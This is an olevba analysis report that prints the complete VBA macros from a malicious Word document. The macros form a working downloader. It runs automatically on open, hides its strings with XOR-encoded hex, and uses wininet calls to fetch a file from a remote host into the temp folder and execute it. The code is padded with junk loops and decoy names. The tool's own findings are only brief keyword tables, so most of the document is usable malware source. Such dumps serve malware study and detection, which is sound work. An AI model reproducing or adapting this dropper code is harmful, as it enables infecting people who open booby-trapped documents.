Malicious Word macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MASIHB- 04.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: 04.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: 04.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16. Sub InIn()
17. CALTHA
18. End Sub
19.  
20. Sub autoopen()
21. InIn
22. End Sub
23.  
24. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
25. ANALYSIS:
26. +----------+----------+---------------------------------------+
27. | Type     | Keyword  | Description                           |
28. +----------+----------+---------------------------------------+
29. | AutoExec | AutoOpen | Runs when the Word document is opened |
30. +----------+----------+---------------------------------------+
31. -------------------------------------------------------------------------------
32. VBA MACRO FILE6.bas
33. in file: 04.doc - OLE stream: u'Macros/VBA/FILE6'
34. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
35.  
36. Option Explicit
37. Public Const BRITTANIA = "BRITTANY"
38.  
39.  
40.  
41. Private Const BRANDI = 8162
42. Private Const BRANDY As String = "HAZ"
43. Private Const BREANA = 1
44. Private Const BREDA = &H4000000
45.  
46. Public Function BRENDA _
47. (ByVal BREE As String) As Boolean
48.     #If VBA7 _
49.     And Win64 Then
50.         Dim BRETT As LongPtr, BRIANNA As LongPtr
51.     #Else
52.         Dim BRETT As Long, BRIANNA As Long
53.     #End If
54.     Dim BRIAR As Long
55.     Dim BRIDGET As String * BRANDI, BRIELLE As String
56.     Dim BRIER As Integer, BRIONY As Double
57.     BRETT = CAMEO(BRANDY, BREANA, vbNullString, vbNullString, 0)
58.     If BRETT = 0 Then
59.         Exit Function
60.     End If
61.     Dim FiGaMan As Boolean
62.    
63.     If BRITANNIA(BRIANNA, BRETT) Then
64.     End If
65.     If BRIANNA = 0 Then
66.         BRIONY = 0
67.     Else
68.         BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR
69.         BRIELLE = BRIDGET
70.         Do While BRIAR <> 0
71.             BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR
72.            
73.             Dim BRITT As Long
74. For BRITT = 6 To 8
75. If BRITT = 38 Then End
76. Next BRITT
77.            
78.             BRIELLE = BRIELLE + Mid(BRIDGET, 1, BRIAR)
79.         Loop
80.             BRIONY = Len(BRIELLE): BRIER = FreeFile
81.         Open BREE _
82.             For Binary Access Write _
83.         Lock Write _
84.         As #BRIER
85.         Put #BRIER, _
86.                 , BRIELLE
87.         Dim BRITTA As Double
88.             For BRITTA = 2 To 3
89.     If BRITTA = 37 Then End
90. Next BRITTA
91.         Close #BRIER
92.     End If
93.     BRITTANI BRIANNA
94.     BRITTANI BRETT
95.     BRIELLE = ""
96.     If BRIONY Then
97.         BRENDA = True
98.     End If
99. End Function
100.  
101. Public _
102. Function BRITTNEY(BRITTNY _
103. As _
104. String)
105. BROGAN
106. End Function
107. Public Function BROGAN()
108.  
109. Dim BRONTE  As Object
110. Set BRONTE = CreateObject _
111. (BROOK(BROOKE, BROOKLYN))
112.  
113. Dim BRYANNA As Object
114. Set BRYANNA = BRYONY(BRONTE)
115.  
116. Dim BUFFY
117. Dim BUNNY
118. BUNNY = BROOK(BROOKE, BUNTY)
119. BUFFY = BRYANNA & BUNNY
120. Dim BURGUNDY As Integer
121. For BURGUNDY = 6 To 7
122. If BURGUNDY = 33 Then End
123. Next BURGUNDY
124. Dim CADENCE As Integer
125. For CADENCE = 2 To 3
126. If CADENCE = 34 Then End
127. Next CADENCE
128.  
129. If CADY(BRONTE, BUFFY) Then
130. BRONTE. _
131. DeleteFile BUFFY
132. End If
133. If BRENDA(BUFFY) Then
134. End If
135. If CADY(BRONTE, BUFFY) Then
136. End If
137. Dim CAELIE
138. Set CAELIE = CreateObject _
139. (BROOK _
140. (BROOKE, CAETLIN))
141. CAELIE.Open BUFFY
142. End Function
143.  
144.  
145. Public Function CANDICE(CANDIDA As String) As Integer
146. CANDICE = Len(CANDIDA)
147. End Function
148.  
149. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
150. ANALYSIS:
151. +------------+----------------+-----------------------------------------+
152. | Type       | Keyword        | Description                             |
153. +------------+----------------+-----------------------------------------+
154. | Suspicious | CreateObject   | May create an OLE object                |
155. | Suspicious | Open           | May open a file                         |
156. | Suspicious | Write          | May write to a file (if combined with   |
157. |            |                | Open)                                   |
158. | Suspicious | Put            | May write to a file (if combined with   |
159. |            |                | Open)                                   |
160. | Suspicious | Binary         | May read or write a binary file (if     |
161. |            |                | combined with Open)                     |
162. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
163. |            |                | may be used to obfuscate strings        |
164. |            |                | (option --decode to see all)            |
165. +------------+----------------+-----------------------------------------+
166. -------------------------------------------------------------------------------
167. VBA MACRO PIDLE0.bas
168. in file: 04.doc - OLE stream: u'Macros/VBA/PIDLE0'
169. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
170.  
171.  
172.  
173. Sub CALTHA()
174.         Dim CAMELLIA As Long
175.  
176.     Dim CANDIS As Double
177. For CANDIS = 44 To 46
178. If CANDIS = 32 Then End
179. Next CANDIS
180. CAMELLIA = 89
181. CALANTHA (CAMELLIA)
182.  
183. End Sub
184.  
185.  
186. Public Function BROOK(CAMERON As String, CAMILLA As String) As String
187.    
188.     Dim CAMILLE As Integer
189.     Dim CAMMIE As Integer
190.    
191.    
192.     Dim CAMRYN As Double
193. For CAMRYN = 1 To 3
194. If CAMRYN = 32 Then End
195. Next CAMRYN
196.    
197.     Dim CANDACE As Long
198.     Dim CANDI As String
199.     For CANDACE = 1 _
200.     To _
201.     ( _
202.     CANDICE _
203.     (CAMILLA) _
204.     / 2)
205.         CAMILLE = Val("&H" & _
206.         (Mid$(CAMILLA, _
207.         (2 * CANDACE) - 1, 2)))
208.         CAMMIE = Asc(Mid$(CAMERON, _
209.         ((CANDACE Mod Len(CAMERON)) + 1), 1))
210.         CANDI = CANDI + Chr(CAMILLE Xor CAMMIE)
211.     Next CANDACE
212.    BROOK = CANDI
213. End Function
214.  
215.  
216. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
217. ANALYSIS:
218. +------------+---------+-----------------------------------------+
219. | Type       | Keyword | Description                             |
220. +------------+---------+-----------------------------------------+
221. | Suspicious | Chr     | May attempt to obfuscate specific       |
222. |            |         | strings                                 |
223. | Suspicious | Xor     | May attempt to obfuscate specific       |
224. |            |         | strings                                 |
225. +------------+---------+-----------------------------------------+
226. -------------------------------------------------------------------------------
227. VBA MACRO IDL4.bas
228. in file: 04.doc - OLE stream: u'Macros/VBA/IDL4'
229. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
230.  
231.  
232. Public Const CAETLIN = "635A5C555F1E7049425C5A5159405C595C"
233. Public Const BUNTY = "6C40565B4643450B1C01521C5D4C50"
234. Public Const CAITLYN = "58464D49091F1E5B5747525957591B5257170301021F050C1C524D57"
235. Public Const BROOKLYN = "63514B5043445857551E755B5451664F414C545E7D5259515143"
236. Public Const BROOKE = "1029930192032845628132034275236"
237.  
238.  
239.  
240.  
241. #If VBA7 And Win64 Then
242. Public Declare PtrSafe Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
243. Public Declare PtrSafe Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
244. Public Declare PtrSafe Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As LongPtr, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
245. Public Declare PtrSafe Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
246. #Else
247. Public Declare Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
248. Public Declare Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
249. Public Declare Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As Long, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
250. Public Declare Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
251. #End If
252.  
253.  
254. Public Function BRYONY(ByRef CALANTHE As Object) As Object
255. Set BRYONY = CALANTHE.GetSpecialFolder(2)
256. End Function
257. Sub CALANTHA(CALEIGH As Long)
258.  
259. BRITTNEY ("CALANTHIA")
260. End Sub
261.  
262.  
263.  
264. Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
265. If CAILEIGH.FileExists(CAILYN) Then
266. CADY = True
267. Else
268. CADY = False
269. End If
270. End Function
271. #If VBA7 _
272.     And Win64 Then
273.        Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
274.     #Else
275.        Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean
276.     #End If
277. Dim CALLIDORA As String
278.     CALLIDORA = BROOK(BROOKE, CAITLYN)
279.    
280.                 CALIDA _
281.     = CALLIE _
282.     ( _
283.     CALLA, _
284.     CALLIDORA, vbNullString, _
285.     0, _
286.     BREDA, 0)
287.     BRITANNIA = True
288. End Function
289.  
290.  
291. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
292. ANALYSIS:
293. +------------+----------------+-----------------------------------------+
294. | Type       | Keyword        | Description                             |
295. +------------+----------------+-----------------------------------------+
296. | Suspicious | Lib            | May run code from a DLL                 |
297. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
298. |            |                | be used to obfuscate strings (option    |
299. |            |                | --decode to see all)                    |
300. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
301. |            |                | may be used to obfuscate strings        |
302. |            |                | (option --decode to see all)            |
303. | IOC        | wininet.dll    | Executable file name                    |
304. +------------+----------------+-----------------------------------------+